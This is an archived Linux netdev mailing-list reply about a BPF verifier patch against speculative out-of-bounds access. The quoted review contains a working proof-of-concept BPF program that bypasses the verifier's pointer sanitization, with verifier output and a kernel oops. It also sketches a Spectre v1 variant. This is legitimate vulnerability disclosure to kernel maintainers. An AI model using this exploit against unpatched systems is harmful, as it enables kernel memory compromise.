All of lore.kernel.org
 help / color / mirror / Atom feed
From: Daniel Borkmann <daniel@iogearbox.net>
To: Jann Horn <jannh@google.com>
Cc: Alexei Starovoitov <ast@kernel.org>,
	"David S. Miller" <davem@davemloft.net>,
	jakub.kicinski@netronome.com,
	Network Development <netdev@vger.kernel.org>
Subject: Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on pointer arithmetic
Date: Fri, 4 Jan 2019 00:22:49 +0100	[thread overview]
Message-ID: <e5d87498-c42e-f53b-5637-9013c1d8d3bd@iogearbox.net> (raw)
In-Reply-To: <CAG48ez3Qwr26xygfsKp-SBM20O5afxQ9EkaYRwcUc9wGLdbFWA@mail.gmail.com>

Hi Jann,

On 01/03/2019 10:13 PM, Jann Horn wrote:
> Hi!
> 
> Sorry about the extremely slow reply, I was on vacation over the
> holidays and only got back today.
> 
> On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
>> Jann reported that the original commit back in b2157399cc98
>> ("bpf: prevent out-of-bounds speculation") was not sufficient
>> to stop CPU from speculating out of bounds memory access:
>> While b2157399cc98 only focussed on masking array map access
>> for unprivileged users for tail calls and data access such
>> that the user provided index gets sanitized from BPF program
>> and syscall side, there is still a more generic form affected
>> from BPF programs that applies to most maps that hold user
>> data in relation to dynamic map access when dealing with
>> unknown scalars or "slow" known scalars as access offset, for
>> example:
> [...]
>> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
>> +                           struct bpf_insn *insn,
>> +                           const struct bpf_reg_state *ptr_reg,
>> +                           struct bpf_reg_state *dst_reg,
>> +                           bool off_is_neg)
>> +{
> [...]
>> +
>> +       /* If we arrived here from different branches with different
>> +        * limits to sanitize, then this won't work.
>> +        */
>> +       if (aux->alu_state &&
>> +           (aux->alu_state != alu_state ||
>> +            aux->alu_limit != alu_limit))
>> +               return -EACCES;
> 
> This code path doesn't get triggered in the case where the same
> ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
> += reg". This leads to kernel read/write because the code intended to
> ensure safety of the "ptr += reg" case in speculative execution ends
> up clobbering the addend in the "numeric_reg += reg" case:
> 
> source code:
> =============
> int main(void) {
>   int my_map = array_create(8, 30);
>   array_set(my_map, 0, 1);
>   struct bpf_insn insns[] = {
>     // load map value pointer into r0 and r2
>     BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
>     BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
>     BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
>     BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
>     BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
>     BPF_EXIT_INSN(),
> 
>     // load some number from the map into r1
>     BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),
> 
>     // branch A
>     BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
>     BPF_MOV64_IMM(BPF_REG_3, 0),
>     BPF_JMP_A(2),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_2, 0),
>     BPF_MOV64_IMM(BPF_REG_3, 0x100000),
> 
>     // *** COMMON INSTRUCTION ***
>     BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),
> 
>     // branch A
>     BPF_JMP_A(4),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
>     // verifier-confused branch: verifier follows fall-through,
> runtime follows jump
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN(),
> 
>     // fake-dead code; targeted from branch A to prevent dead code sanitization
>     BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN()
>   };
>   int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
>   trigger_proc(sock_fd);
> }
> =============
> 
> verifier output:
> =============
> 0: (18) r1 = 0x0
> 2: (bf) r2 = r10
> 3: (07) r2 += -16
> 4: (7a) *(u64 *)(r10 -16) = 0
> 5: (85) call bpf_map_lookup_elem#1
> 6: (55) if r0 != 0x0 goto pc+1
>  R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 7: (95) exit
> 
> from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1
> fp-16=mmmmmmmm
> 8: (71) r1 = *(u8 *)(r0 +0)
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
> 9: (55) if r1 != 0x0 goto pc+3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 10: (bf) r2 = r0
> 11: (b7) r3 = 0
> 12: (05) goto pc+2
> 15: (0f) r2 += r3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
> R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1
> fp-16=mmmmmmmm
> 16: (55) if r1 != 0x0 goto pc+1
> 17: (05) goto pc+4
> 22: (71) r0 = *(u8 *)(r0 +0)
>  R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
> R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1
> fp-16=mmmmmmmm
> 23: (b7) r0 = 0
> 24: (95) exit
> 
> from 15 to 16 (speculative execution): safe
> 
> from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
> R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1
> fp-16=mmmmmmmm
> 13: (b7) r2 = 0
> 14: (b7) r3 = 1048576
> 15: (0f) r2 += r3
> 16: (55) if r1 != 0x0 goto pc+1
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576
> R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 17: (05) goto pc+4
> 22: safe
> 
> from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
> R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576
> R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 18: (b7) r0 = 322376503
> 19: (55) if r2 != 0x100000 goto pc+2
> 20: (b7) r0 = 0
> 21: (95) exit
> processed 29 insns (limit 131072), stack depth 16
> =============
> 
> dmesg:
> =============
> [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164
> from=test pid=2185
> [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48
> 83 ed 28 48
> [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c
> 89 7d 18 31
> [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81
> 88 ff ff 48
> [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00
> 00 00 48 81
> [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e
> 73 0c 83 e0
> [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0
> 48 83 f8 00
> [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b
> 75 10 4c 8b
> [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78
> 00 48 83 ff
> [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6
> ba 00 00 10
> [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09
> d2 49 f7 da
> [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83
> ff 00 75 02
> [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00
> 10 00 75 04
> [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
> [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
> [ 9948.481562] #PF error: [normal kernel read fault]
> [ 9948.483878] PGD 0 P4D 0
> [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
> [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
> [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
> BIOS 1.10.2-1 04/01/2014
> [ 9948.494912] RIP: 0010:0xffffffffc01602f3
> [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6
> 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31
> c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc
> cc cc
> [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
> [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
> [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
> [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
> [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
> [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
> [ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000)
> knlGS:0000000000000000
> [ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
> [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
> [ 9948.542581] Call Trace:
> [ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
> [ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
> [ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
> [ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
> [ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
> [ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
> [ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
> [ 9948.558856]  ? unix_stream_connect+0x980/0x980
> [ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
> [ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
> [ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
> [ 9948.568463]  ? unix_stream_connect+0x980/0x980
> [ 9948.570397]  ? sock_sendmsg+0x6d/0x80
> [ 9948.571948]  ? sock_write_iter+0x121/0x1c0
> [ 9948.573678]  ? sock_sendmsg+0x80/0x80
> [ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
> [ 9948.576958]  ? iov_iter_init+0x86/0xc0
> [ 9948.578395]  ? __vfs_write+0x294/0x3b0
> [ 9948.579782]  ? kernel_read+0xa0/0xa0
> [ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
> [ 9948.582919]  ? vfs_write+0xe7/0x230
> [ 9948.584228]  ? ksys_write+0xa1/0x120
> [ 9948.585559]  ? __ia32_sys_read+0x50/0x50
> [ 9948.587174]  ? do_syscall_64+0x73/0x160
> [ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
> [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
> [ 9948.593654] CR2: 0000000013371337
> [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
> =============

Good point, thanks for catching this scenario! I'll get this fixed in
order to reject such programs.

> Aside from that, I also think that the pruning of "dead code" probably
> still permits v1 speculative execution attacks when code vaguely like
> the following is encountered, if it is possible to convince the CPU to
> mispredict the second branch, but I haven't tested that so far:
> 
> R0 = <slow map value, known to be 0>;
> R1 = <fast map value>;
> if (R1 != R0) { // mispredicted
>   return 0;
> }
> R3 = <a map value pointer>;
> R2 = <arbitrary 64-bit number>;
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];
> 
> To convince the CPU to predict the second branch the way you want, you
> could probably add another code path that jumps in front of the branch
> with both R2 and R3 already containing valid pointers. Something like
> this:
> 
> if (<some map value>) {
>   R0 = <slow map value, known to be 0>;
>   R1 = <fast map value>;
>   if (R1 != R0) { // mispredicted
>     return 0;
>   }
>   R3 = <a map value pointer>;
>   R2 = <arbitrary 64-bit number>;} else {  R3 = <a map value pointer>;
>  R2 = <arbitrary 64-bit number>;  R1 = 1;}
> if (R1 == 0) { // architecturally always taken, verifier prunes other branch
>   R2 = <a map value pointer>;
> }
> access R3[R2[0] & 1];

Thanks, I'll look into evaluating this case as well after the fix.

Best,
Daniel

  reply	other threads:[~2019-01-03 23:22 UTC|newest]

Thread overview: 19+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2019-01-02 23:58 [PATCH bpf v3 0/9] bpf fix to prevent oob under speculation Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 1/9] bpf: move {prev_,}insn_idx into verifier env Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 2/9] bpf: move tmp variable into ax register in interpreter Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 3/9] bpf: enable access to ax register also from verifier rewrite Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 4/9] bpf: restrict map value pointer arithmetic for unprivileged Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 5/9] bpf: restrict stack " Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 6/9] bpf: restrict unknown scalars of mixed signed bounds " Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 7/9] bpf: fix check_map_access smin_value test when pointer contains offset Daniel Borkmann
2019-01-02 23:58 ` [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on pointer arithmetic Daniel Borkmann
2019-01-03 21:13   ` Jann Horn
2019-01-03 23:22     ` Daniel Borkmann [this message]
2019-01-02 23:58 ` [PATCH bpf v3 9/9] bpf: add various test cases to selftests Daniel Borkmann
2019-01-03  0:08 ` [PATCH bpf v3 0/9] bpf fix to prevent oob under speculation Alexei Starovoitov
2019-01-22 14:36   ` stable backport for the BPF speculation series? [was: Re: [PATCH bpf v3 0/9] bpf fix to prevent oob under speculation] Jann Horn
2019-01-22 16:44     ` stable backport for the BPF speculation series? David Miller
2019-01-23  1:55       ` Daniel Borkmann
2019-01-23 17:04     ` stable backport for the BPF speculation series? [was: Re: [PATCH bpf v3 0/9] bpf fix to prevent oob under speculation] Greg Kroah-Hartman
2019-01-23 17:12       ` Jann Horn
2019-01-24 11:53         ` Daniel Borkmann

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=e5d87498-c42e-f53b-5637-9013c1d8d3bd@iogearbox.net \
    --to=daniel@iogearbox.net \
    --cc=ast@kernel.org \
    --cc=davem@davemloft.net \
    --cc=jakub.kicinski@netronome.com \
    --cc=jannh@google.com \
    --cc=netdev@vger.kernel.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.